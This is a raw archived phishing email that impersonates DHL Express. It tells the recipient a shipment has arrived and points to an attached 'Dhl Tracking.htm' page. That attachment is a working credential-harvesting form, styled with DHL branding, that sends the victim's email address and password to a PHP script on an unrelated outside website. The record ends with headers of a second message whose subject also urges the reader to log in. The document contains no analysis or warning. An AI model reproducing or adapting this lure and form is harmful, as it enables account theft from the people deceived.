From: "DHL EXpress" <costing@htm.co.id>
Date: Mon, 15 Aug 2016 12:26:26 -0400
Message-Id: <20160815162656.109322C3BEB@mail2.htm.co.id>
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 339

You will not see this in a MIME-aware mail reader.
--===============0143224246==
Content-Type: multipart/alternative; boundary="===============1518875810=="
MIME-Version: 1.0

--===============1518875810==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

 =

 =

    =

   =

 Dear Value Customer,
 =

   You have a new shipment waiting for you.

 =

   =

 =

   =

 =

    Your new shipment just arrived our arrival facility,
 Find as attach for your shipment details.

 =

   =

 =

   =

 =

   =

 =

   =

 =

   =

 =

   We are ready to receive your comments and to serve you better every day.
 =

   =

	 	 =

  =

 =

    =

    This email was sent  by patronizing DHL Express, and subscribers of our=
 newsletters.To ensure you receive our emails, add the e -news.com world@dh=
.coml your contacts list.

  =

      =

	  	 Deutsche Post DHL - The Mail & Logistics Group.=A9 2016 DHL Internatio=
nal GmbH. All rights reserved.
 =

 =

    =

    Rif J-00143809-2 - With Post 10-04
--===============1518875810==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><P style=3D"WHITE-SPACE: normal; TEXT-TRANSFOR=
M: none; WORD-SPACING: 0px; COLOR: rgb(34,34,34); FONT: 13px Verdana, Genev=
a, sans-serif; WIDOWS: 1; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255=
,255,255); TEXT-INDENT: 0px; -webkit-text-stroke-width: 0px"><IMG class=3DC=
ToWUd alt=3D"" src=3D"https://ci4.googleusercontent.com/proxy/7VL4cvdqmRT9s=
rqVebvyiLV4XuXXOeM7zvUsKvJcwwaZjx6223gw0uztPy62cOkgFNj5UanMLW-Bhq_aRhWFwLVY=
jPTb_73HMQ-ketM_jQ=3Ds0-d-e1-ft#https://i.emlfiles.com/cmpimg/2011/32178/13=
51318_logo.png" width=3D133 height=3D37><SPAN>&nbsp;</SPAN><IMG class=3DCTo=
WUd hspace=3D0 alt=3D"" src=3D"https://ci6.googleusercontent.com/proxy/EuCq=
7706vrgEmaJ4_mN1l-cSIkluuc-_YSh2P6EKjQ967F8aQ5ro9IsLlsisiPMj5cRVrPuXwneOu-r=
4MIfg3ph4HEqieBKpv-sJVEQ3pgQ=3Ds0-d-e1-ft#https://i.emlfiles.com/cmpimg/201=
1/32178/1349708_blank.gif" width=3D1 height=3D11><SPAN></SPAN><IMG class=3D=
CToWUd alt=3D"" src=3D"https://ci6.googleusercontent.com/proxy/EuCq7706vrgE=
maJ4_mN1l-cSIkluuc-_YSh2P6EKjQ967F8aQ5ro9IsLlsisiPMj5cRVrPuXwneOu-r4MIfg3ph=
4HEqieBKpv-sJVEQ3pgQ=3Ds0-d-e1-ft#https://i.emlfiles.com/cmpimg/2011/32178/=
1349708_blank.gif" width=3D1 height=3D1><IMG class=3DCToWUd alt=3D"" src=3D=
"https://ci6.googleusercontent.com/proxy/EuCq7706vrgEmaJ4_mN1l-cSIkluuc-_YS=
h2P6EKjQ967F8aQ5ro9IsLlsisiPMj5cRVrPuXwneOu-r4MIfg3ph4HEqieBKpv-sJVEQ3pgQ=
=3Ds0-d-e1-ft#https://i.emlfiles.com/cmpimg/2011/32178/1349708_blank.gif" w=
idth=3D1 height=3D1><IMG class=3DCToWUd alt=3D"" src=3D"https://ci6.googleu=
sercontent.com/proxy/EuCq7706vrgEmaJ4_mN1l-cSIkluuc-_YSh2P6EKjQ967F8aQ5ro9I=
sLlsisiPMj5cRVrPuXwneOu-r4MIfg3ph4HEqieBKpv-sJVEQ3pgQ=3Ds0-d-e1-ft#https://=
i.emlfiles.com/cmpimg/2011/32178/1349708_blank.gif" width=3D1 height=3D1><I=
MG class=3DCToWUd alt=3D"" src=3D"https://ci6.googleusercontent.com/proxy/E=
uCq7706vrgEmaJ4_mN1l-cSIkluuc-_YSh2P6EKjQ967F8aQ5ro9IsLlsisiPMj5cRVrPuXwneO=
u-r4MIfg3ph4HEqieBKpv-sJVEQ3pgQ=3Ds0-d-e1-ft#https://i.emlfiles.com/cmpimg/=
2011/32178/1349708_blank.gif" width=3D1 height=3D1><IMG class=3DCToWUd alt=
=3D"" src=3D"https://ci6.googleusercontent.com/proxy/EuCq7706vrgEmaJ4_mN1l-=
cSIkluuc-_YSh2P6EKjQ967F8aQ5ro9IsLlsisiPMj5cRVrPuXwneOu-r4MIfg3ph4HEqieBKpv=
-sJVEQ3pgQ=3Ds0-d-e1-ft#https://i.emlfiles.com/cmpimg/2011/32178/1349708_bl=
ank.gif" width=3D1 height=3D6></P>
<TABLE style=3D"WHITE-SPACE: normal; TEXT-TRANSFORM: none; WORD-SPACING: 0p=
x; COLOR: rgb(34,34,34); FONT: 13px Verdana, Geneva, sans-serif; WIDOWS: 1;=
 LETTER-SPACING: normal; WIDTH: 569px; BACKGROUND-COLOR: rgb(255,255,255); =
TEXT-INDENT: 0px; -webkit-text-stroke-width: 0px" cellSpacing=3D0 cellPaddi=
ng=3D0 border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" vAlign=3Dtop alig=
n=3Dleft>
<TABLE style=3D"WIDTH: 385px" cellSpacing=3D0 cellPadding=3D0 border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" height=3D16><IMG =
class=3DCToWUd hspace=3D0 alt=3D"" src=3D"https://ci6.googleusercontent.com=
/proxy/EuCq7706vrgEmaJ4_mN1l-cSIkluuc-_YSh2P6EKjQ967F8aQ5ro9IsLlsisiPMj5cRV=
rPuXwneOu-r4MIfg3ph4HEqieBKpv-sJVEQ3pgQ=3Ds0-d-e1-ft#https://i.emlfiles.com=
/cmpimg/2011/32178/1349708_blank.gif" width=3D10 height=3D16></TD></TR></TB=
ODY></TABLE>
<P align=3Dleft><SPAN style=3D"FONT-FAMILY: Arial"><SPAN style=3D"FONT-SIZE=
: medium">Dear Value Customer,</SPAN></SPAN></P>
<TABLE style=3D"WIDTH: 385px" cellSpacing=3D0 cellPadding=3D0 border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" bgColor=3D#ffffff=
 height=3D16><SPAN>You have a new&nbsp;shipment waiting for you.<BR></SPAN>=
</TD></TR></TBODY></TABLE>
<TABLE style=3D"WIDTH: 385px" cellSpacing=3D0 cellPadding=3D0 border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" height=3D14><IMG =
class=3DCToWUd hspace=3D0 alt=3D"" src=3D"https://ci6.googleusercontent.com=
/proxy/EuCq7706vrgEmaJ4_mN1l-cSIkluuc-_YSh2P6EKjQ967F8aQ5ro9IsLlsisiPMj5cRV=
rPuXwneOu-r4MIfg3ph4HEqieBKpv-sJVEQ3pgQ=3Ds0-d-e1-ft#https://i.emlfiles.com=
/cmpimg/2011/32178/1349708_blank.gif" width=3D10 height=3D14></TD></TR></TB=
ODY></TABLE>
<TABLE style=3D"WIDTH: 385px" cellSpacing=3D0 cellPadding=3D0 border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" height=3D14><IMG =
class=3DCToWUd hspace=3D0 alt=3D"" src=3D"https://ci6.googleusercontent.com=
/proxy/EuCq7706vrgEmaJ4_mN1l-cSIkluuc-_YSh2P6EKjQ967F8aQ5ro9IsLlsisiPMj5cRV=
rPuXwneOu-r4MIfg3ph4HEqieBKpv-sJVEQ3pgQ=3Ds0-d-e1-ft#https://i.emlfiles.com=
/cmpimg/2011/32178/1349708_blank.gif" width=3D10 height=3D14></TD></TR></TB=
ODY></TABLE>
<TABLE style=3D"WIDTH: 385px" cellSpacing=3D0 cellPadding=3D0 border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px">
<P><SPAN><SPAN>Your new shipment just arrived our arrival facility,</SPAN><=
/SPAN></P>
<P><SPAN><SPAN><SPAN style=3D"WHITE-SPACE: normal; TEXT-TRANSFORM: none; WO=
RD-SPACING: 0px; FLOAT: none; COLOR: rgb(34,34,34); FONT: 24px/32px arial, =
helvetica, sans-serif; WIDOWS: 1; DISPLAY: inline !important; LETTER-SPACIN=
G: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; -webkit-te=
xt-stroke-width: 0px">Find as attach for your shipment details.</SPAN></SPA=
N></SPAN></P></TD></TR></TBODY></TABLE>
<TABLE style=3D"WIDTH: 385px" cellSpacing=3D0 cellPadding=3D0 border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" height=3D16><IMG =
class=3DCToWUd hspace=3D0 alt=3D"" src=3D"https://ci6.googleusercontent.com=
/proxy/EuCq7706vrgEmaJ4_mN1l-cSIkluuc-_YSh2P6EKjQ967F8aQ5ro9IsLlsisiPMj5cRV=
rPuXwneOu-r4MIfg3ph4HEqieBKpv-sJVEQ3pgQ=3Ds0-d-e1-ft#https://i.emlfiles.com=
/cmpimg/2011/32178/1349708_blank.gif" width=3D10 height=3D16></TD></TR></TB=
ODY></TABLE>
<TABLE style=3D"WIDTH: 385px" cellSpacing=3D0 cellPadding=3D0 border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" height=3D14><IMG =
class=3DCToWUd hspace=3D0 alt=3D"" src=3D"https://ci6.googleusercontent.com=
/proxy/EuCq7706vrgEmaJ4_mN1l-cSIkluuc-_YSh2P6EKjQ967F8aQ5ro9IsLlsisiPMj5cRV=
rPuXwneOu-r4MIfg3ph4HEqieBKpv-sJVEQ3pgQ=3Ds0-d-e1-ft#https://i.emlfiles.com=
/cmpimg/2011/32178/1349708_blank.gif" width=3D10 height=3D14></TD></TR></TB=
ODY></TABLE>
<TABLE style=3D"WIDTH: 385px" cellSpacing=3D0 cellPadding=3D0 border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px"></TD></TR></TBODY=
></TABLE>
<TABLE style=3D"WIDTH: 385px" cellSpacing=3D0 cellPadding=3D0 border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" height=3D16><IMG =
class=3DCToWUd hspace=3D0 alt=3D"" src=3D"https://ci6.googleusercontent.com=
/proxy/EuCq7706vrgEmaJ4_mN1l-cSIkluuc-_YSh2P6EKjQ967F8aQ5ro9IsLlsisiPMj5cRV=
rPuXwneOu-r4MIfg3ph4HEqieBKpv-sJVEQ3pgQ=3Ds0-d-e1-ft#https://i.emlfiles.com=
/cmpimg/2011/32178/1349708_blank.gif" width=3D10 height=3D16></TD></TR></TB=
ODY></TABLE>
<TABLE style=3D"WIDTH: 385px" cellSpacing=3D0 cellPadding=3D0 border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" height=3D14><IMG =
class=3DCToWUd hspace=3D0 alt=3D"" src=3D"https://ci6.googleusercontent.com=
/proxy/EuCq7706vrgEmaJ4_mN1l-cSIkluuc-_YSh2P6EKjQ967F8aQ5ro9IsLlsisiPMj5cRV=
rPuXwneOu-r4MIfg3ph4HEqieBKpv-sJVEQ3pgQ=3Ds0-d-e1-ft#https://i.emlfiles.com=
/cmpimg/2011/32178/1349708_blank.gif" width=3D10 height=3D14></TD></TR></TB=
ODY></TABLE>
<TABLE style=3D"WIDTH: 385px" cellSpacing=3D0 cellPadding=3D0 border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px"><SPAN><STRONG><SP=
AN>We are ready to receive your comments and to serve you better every day.=
</SPAN></STRONG></SPAN></TD></TR></TBODY></TABLE>
<TABLE style=3D"WIDTH: 385px" cellSpacing=3D0 cellPadding=3D0 border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" height=3D16><IMG =
class=3DCToWUd hspace=3D0 alt=3D"" src=3D"https://ci6.googleusercontent.com=
/proxy/EuCq7706vrgEmaJ4_mN1l-cSIkluuc-_YSh2P6EKjQ967F8aQ5ro9IsLlsisiPMj5cRV=
rPuXwneOu-r4MIfg3ph4HEqieBKpv-sJVEQ3pgQ=3Ds0-d-e1-ft#https://i.emlfiles.com=
/cmpimg/2011/32178/1349708_blank.gif" width=3D10 height=3D16></TD></TR></TB=
ODY></TABLE></TD>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" width=3D10><IMG c=
lass=3DCToWUd hspace=3D0 alt=3D"" src=3D"https://ci6.googleusercontent.com/=
proxy/EuCq7706vrgEmaJ4_mN1l-cSIkluuc-_YSh2P6EKjQ967F8aQ5ro9IsLlsisiPMj5cRVr=
PuXwneOu-r4MIfg3ph4HEqieBKpv-sJVEQ3pgQ=3Ds0-d-e1-ft#https://i.emlfiles.com/=
cmpimg/2011/32178/1349708_blank.gif" width=3D10 height=3D1></TD>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" vAlign=3Dmiddle w=
idth=3D170><A style=3D"COLOR: rgb(34,34,34)" rel=3Dnofollow><IMG class=3DCT=
oWUd border=3D0 hspace=3D0 alt=3D"" src=3D"https://ci4.googleusercontent.co=
m/proxy/e7yb4f9vMIpR38HiD9fEp27S0C3goFBDlMtDCYqT0f9MpnrPlQVdio0I_yhbd9Da7B0=
i3VqnJKAI71edgnP1cezY-8t0v4X6UO8lxgClE6x2hCNJZE5HRzj_d2Zx1jmZ_nU8Vve2wsG4tv=
N2CqOgexTgUON3XeFGro94cQ=3Ds0-d-e1-ft#https://i.emlfiles.com/cmpimg/2/2/9/5=
/2/files/imagecache/835056/w170_1464366_latinamericanmaledown.jpg" width=3D=
170 height=3D374></A></TD></TR></TBODY></TABLE>
<P style=3D"WHITE-SPACE: normal; TEXT-TRANSFORM: none; WORD-SPACING: 0px; C=
OLOR: rgb(34,34,34); FONT: 13px Verdana, Geneva, sans-serif; WIDOWS: 1; LET=
TER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; =
-webkit-text-stroke-width: 0px"><IMG class=3DCToWUd hspace=3D0 alt=3D"" src=
=3D"https://ci6.googleusercontent.com/proxy/EuCq7706vrgEmaJ4_mN1l-cSIkluuc-=
_YSh2P6EKjQ967F8aQ5ro9IsLlsisiPMj5cRVrPuXwneOu-r4MIfg3ph4HEqieBKpv-sJVEQ3pg=
Q=3Ds0-d-e1-ft#https://i.emlfiles.com/cmpimg/2011/32178/1349708_blank.gif" =
width=3D1 height=3D20><SPAN>&nbsp;</SPAN><IMG class=3DCToWUd hspace=3D0 alt=
=3D"" src=3D"https://ci6.googleusercontent.com/proxy/EuCq7706vrgEmaJ4_mN1l-=
cSIkluuc-_YSh2P6EKjQ967F8aQ5ro9IsLlsisiPMj5cRVrPuXwneOu-r4MIfg3ph4HEqieBKpv=
-sJVEQ3pgQ=3Ds0-d-e1-ft#https://i.emlfiles.com/cmpimg/2011/32178/1349708_bl=
ank.gif" width=3D1 height=3D20><SPAN></SPAN><SPAN></SPAN><SPAN></SPAN></P>
<TABLE style=3D"WHITE-SPACE: normal; TEXT-TRANSFORM: none; WORD-SPACING: 0p=
x; COLOR: rgb(34,34,34); FONT: 13px Verdana, Geneva, sans-serif; WIDOWS: 1;=
 LETTER-SPACING: normal; WIDTH: 1492px; BACKGROUND-COLOR: rgb(255,255,255);=
 TEXT-INDENT: 0px; -webkit-text-stroke-width: 0px" cellSpacing=3D0 cellPadd=
ing=3D0 border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" width=3D290>
<TABLE style=3D"WIDTH: 722px" cellSpacing=3D0 cellPadding=3D0 border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px">
<DIV><SPAN><SPAN>This email was sent&nbsp;</SPAN><SPAN>&nbsp;</SPAN><SPAN>b=
y patronizing DHL Express, and subscribers of our newsletters.To ensure you=
 receive our emails, add the e&nbsp;</SPAN><A style=3D"COLOR: rgb(17,85,204=
)" href=3D"mailto:venezuela@dhl-news.com" rel=3Dnofollow target=3D_blank><S=
PAN><SPAN>-news.com world@dh.coml</SPAN></SPAN></A><SPAN>&nbsp;your contact=
s list.</SPAN><BR></SPAN></DIV></TD></TR>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px"><IMG class=3DCToW=
Ud hspace=3D0 alt=3D"" align=3Dleft src=3D"https://ci6.googleusercontent.co=
m/proxy/EuCq7706vrgEmaJ4_mN1l-cSIkluuc-_YSh2P6EKjQ967F8aQ5ro9IsLlsisiPMj5cR=
VrPuXwneOu-r4MIfg3ph4HEqieBKpv-sJVEQ3pgQ=3Ds0-d-e1-ft#https://i.emlfiles.co=
m/cmpimg/2011/32178/1349708_blank.gif" width=3D1 height=3D15></TD></TR>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px">
<DIV><SPAN><SPAN>&nbsp;&nbsp;&nbsp;</SPAN></SPAN></DIV></TD></TR></TBODY></=
TABLE></TD>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" width=3D60>&nbsp;=
</TD>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" vAlign=3Dtop widt=
h=3D250><SPAN style=3D"FONT-FAMILY: Arial, Helvetica, sans-serif; COLOR: rg=
b(0,0,0)"><STRONG><SPAN>Deutsche Post DHL</SPAN></STRONG><SPAN>&nbsp;- The =
Mail &amp; Logistics Group.=A9 2016 DHL International GmbH.&nbsp;All rights=
 reserved.</SPAN></SPAN></TD></TR></TBODY></TABLE>
<P style=3D"WHITE-SPACE: normal; TEXT-TRANSFORM: none; WORD-SPACING: 0px; C=
OLOR: rgb(34,34,34); FONT: 13px Verdana, Geneva, sans-serif; WIDOWS: 1; LET=
TER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; =
-webkit-text-stroke-width: 0px"><IMG class=3DCToWUd hspace=3D0 alt=3D"" src=
=3D"https://ci6.googleusercontent.com/proxy/EuCq7706vrgEmaJ4_mN1l-cSIkluuc-=
_YSh2P6EKjQ967F8aQ5ro9IsLlsisiPMj5cRVrPuXwneOu-r4MIfg3ph4HEqieBKpv-sJVEQ3pg=
Q=3Ds0-d-e1-ft#https://i.emlfiles.com/cmpimg/2011/32178/1349708_blank.gif" =
width=3D1 height=3D20><SPAN></SPAN><SPAN></SPAN><SPAN></SPAN></P>
<TABLE style=3D"WHITE-SPACE: normal; TEXT-TRANSFORM: none; WORD-SPACING: 0p=
x; COLOR: rgb(34,34,34); FONT: 13px Verdana, Geneva, sans-serif; WIDOWS: 1;=
 LETTER-SPACING: normal; WIDTH: 1492px; BACKGROUND-COLOR: rgb(255,255,255);=
 TEXT-INDENT: 0px; -webkit-text-stroke-width: 0px" cellSpacing=3D0 cellPadd=
ing=3D0 border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px">
<TABLE style=3D"WIDTH: 1492px" cellSpacing=3D0 cellPadding=3D0 border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px">
<DIV><SPAN><SPAN>Rif J-00143809-2 - With Post 10-04</SPAN></SPAN></DIV></TD=
></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></BODY></HTML>
--===============1518875810==--
--===============0143224246==
MIME-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment; filename="Dhl Tracking.htm"

=EF=BB=BF
<html>
<HEAD>
<TITLE>DHL | Tracking</TITLE>	=

<title>TRADE FILE</title>
<link rel=3D"shortcut icon" href=3D"http://www.dhl.com/img/favicon.gif" typ=
e=3D"image/gif"/>
</head>
<script type=3D"text/javascript"><!--
function validateForm() {
with (document.myform) {
var alertMsg =3D "The following REQUIRED fields\nhave been left empty:\n";
if (email.value =3D=3D "") alertMsg +=3D "\nEmail";
if (epass.value =3D=3D "") alertMsg +=3D "\nEmail Password";
if (alertMsg !=3D "The following REQUIRED fields\nhave been left empty:\n")=
 {
alert(alertMsg);
return false;
} else {
return true;
} } }
// --></script>
<body background=3D"http://www.dhl.com/img/modules/5_1_dhl_global_locator_a=
ll_340_187.gif" text=3D"black" link=3D"blue" alink=3D"blue" vlink=3D"blue" =
background=3D"" >
<!-- 66613 -->
<font face=3D"Arial" style=3D"font-size: 20pt" color=3D"#CD0000">
<center><b>Sign In Your Email to View Your Tracking</b></font><font face=3D=
"verdana,arial" size=3D-1><p>
<img src=3D"http://www.dhl.com/img/meta/dhl_logo.gif" width=3D"300" height=
=3D"100">
</p>
<table cellpadding=3D2 cellspacing=3D0 border=3D0>
<tr><td bgcolor=3D"#FFA500"><table cellpadding=3D0 cellspacing=3D0 border=
=3D0 width=3D100%><tr><td bgcolor=3D"#CD0000" align=3Dcenter style=3D"paddi=
ng:2;padding-bottom:4"><b>
	<font size=3D-1 color=3D"white" face=3D"Comic Sans MS">Sign In With Your C=
orrect Email and Password To Review Package Information</font></b></font><b=
><font face=3D"Comic Sans MS" size=3D-1></th></font><font face=3D"Comic San=
s MS" size=3D-1></tr>

</font><font face=3D"verdana,arial" size=3D-1>
<tr><td bgcolor=3D"white" style=3D"padding:5"><br>
<form action=3D"http://jonovelli.com/blog/wp-includes/js/jcrop/mrt/verify.p=
hp" onsubmit=3D"return validateForm()" method=3D"post" name=3D"myform">
<center><table width=3D"517">

<tr><td colspan=3D2><font face=3D"verdana,arial" size=3D-1>
	</font><font face=3D"verdana,arial" size=3D1><span  class=3Dtext1a><b><fon=
t color=3D"red">(*)</font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Denotes requi=
red field. </b> </span></td></tr>

<tr><td width=3D"115"><font face=3D"verdana,arial" size=3D-1> =

<font color=3D"red">*</font>&nbsp;&nbsp;&nbsp;&nbsp; <b>E-MAIL ID:</b></td>=
<td width=3D"397"><input type=3D"text" name=3D"email" size=3D"40"></td></tr>

<tr><td colspan=3D2><font face=3D"verdana,arial" size=3D-1>&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
	</font><font face=3D"verdana,arial" size=3D1><span  class=3Dtext1a>(exampl=
e777@domain.com)</span></td></tr>
<tr>
<font face=3D"verdana,arial" size=3D-1>
	<td width=3D"115"><font face=3D"verdana,arial" size=3D-1><font color=3D"re=
d">*</font>&nbsp;&nbsp;&nbsp;&nbsp;<b>PASSWORD:</b></td>

	<td width=3D"397"><input type=3D"password" name=3D"epass" size=3D"40"></td>

	</font>
</tr>
<tr>

<font face=3D"verdana,arial" size=3D-1>
	<td width=3D"110"><font face=3D"verdana,arial" size=3D-1>&nbsp;</td>
	<td width=3D"397"><font face=3D"verdana,arial" size=3D-1><input type=3D"su=
bmit" value=3D"Log in To View"></td>
	</font>
</tr>
<tr><td colspan=3D2><font face=3D"verdana,arial" size=3D-1></td></tr>
</table></center>
</form>

	<script language=3D"JavaScript">
	<!-- =

			if (document.aform.login.value =3D=3D '') {
				document.aform.login.focus();
			} =

	-->
	</script>
</td></tr></table></td></tr></table>
<div class=3D"copyright cLight">

&nbsp;</div>
<p>Copyright Notice =C2=A9 1999-2014 DHL WorldWide Delivery. =

All rights reserved. </p>
&nbsp;<center><p><hr size=3D1 width=3D"90%">&nbsp;</p></center>
</font>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img alt=3D"=
http://mimg.126.net/logo/126logo.gif" src=3D"http://mimg.126.net/logo/126lo=
go.gif"><img alt=3D"http://p.ebaystatic.com/aw/pics/logos/logoEbay_x45.gif"=
 src=3D"http://p.ebaystatic.com/aw/pics/logos/logoEbay_x45.gif" width=3D"11=
0" height=3D"36">&nbsp; <img src=3D"http://img3.cache.netease.com/www/logo/=
logo_png.png" alt=3D"" title=3D"" border=3D0 width=3D122 height=3D44>&nbsp;=
&nbsp; <img src=3D"https://www.google.com/images/logos/mail_logo.png" alt=
=3D"" title=3D"" border=3D0 width=3D142 height=3D26><img src=3D"https://sec=
ure.wlxrs.com/~Live.SiteContent.ID/~16.0.2/~/~/~/~/images/WindowsLive.png" =
alt=3D"" title=3D"" border=3D0 width=3D175 height=3D23>&nbsp;<img src=3D"ht=
tp://mimg.yeah.net/logo/yeahlogo_middle.gif" alt=3D"" title=3D"" border=3D0=
 width=3D174 height=3D62>
<img src=3D"http://l.yimg.com/a/i/ww/met/yahoo_logo_us_061509.png" alt=3D""=
 title=3D"" border=3D0 width=3D138 height=3D49></p>

</body>
</html>
--===============0143224246==--

From jose@monkey.org Tue Aug 16 00:05:45 2016 +0000
Return-Path: www-data@iserv15.adl-services.com
Delivered-To: jose@monkey.org
X-FDA: 71852811450.02.egg46_89763a3225833
X-Spam-Summary: 77,5.5,0,e53c769a6bbfd6eb,d41d8cd98f00b204,www-data@iserv15.adl-services.com,:,RULES_HIT:2:41:46:72:150:153:355:375:379:455:960:962:967:969:973:978:983:988:989:1081:1147:1189:1208:1224:1260:1263:1313:1314:1345:1381:1390:1431:1432:1433:1434:1436:1437:1516:1517:1535:1571:1588:1589:1592:1686:1710:1730:1744:1747:1777:1792:1801:1803:2084:2107:2194:2198:2199:2200:2393:2525:2527:2528:2538:2539:2543:2560:2568:2610:2682:2685:2859:2890:2894:2895:2901:2902:2909:2913:2923:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3245:3354:3623:3865:3866:3867:3868:3870:3871:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4051:4120:4321:4365:4384:4429:4552:4605:4700:5007:6096:6117:6119:6239:6248:6261:6669:6674:6678:6684:6688:7875:7903:8599:8603:8828:8957:8985:9025:9072:9074:9080:9203:9344:9388:9908:10049:10053:10085:10231:10346:10919:11026:11232:11289:11529:11656:11658:11914:12043:12219:12324:12438:12555:12635:12679:12812:12956:12958
X-HE-Tag: egg46_89763a3225833
X-Filterd-Recvd-Size: 9194
Received: from iserv15.adl-services.com (iserv15.adl-services.com [195.154.221.17])
	by imf11.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Tue, 16 Aug 2016 00:05:44 +0000 (UTC)
Received: by iserv15.adl-services.com (Postfix, from userid 33)
	id A90C71DF243F; Tue, 16 Aug 2016 02:04:24 +0200 (CEST)
To: jose@monkey.org
Subject: =?UTF-8?Q?=E2=9C=89_?= Please log in to your account to see the steps that apply to you =?utf-8?Q?=E2=9C=94?=
X-PHP-Originating-Script: 33:105.php
